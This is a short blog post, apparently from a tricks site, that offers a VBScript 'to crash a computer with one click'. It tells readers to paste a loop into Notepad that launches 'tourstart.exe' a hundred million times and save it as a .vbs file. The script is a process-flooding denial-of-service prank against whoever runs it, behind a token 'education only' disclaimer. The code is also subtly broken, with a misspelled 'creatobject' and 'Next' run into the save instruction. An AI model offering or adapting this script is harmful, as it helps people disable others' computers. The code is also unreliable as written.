How To Crash Computer With Only One Click

How To Crash Computer With Only One Click





this information only for education purpose only, we will not responsible for any damage. 



1️⃣ Open Notepad

2️⃣ Copy This Code

Dim WSHSHELL
Set
Wshshell=wscript.creatobject("wscript.shell")

Dim x
For x = 1 to 100000000
Wshshell.run "tourstart.exe"

Next Save It As Anything.vbs


No comments:

Post a Comment

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...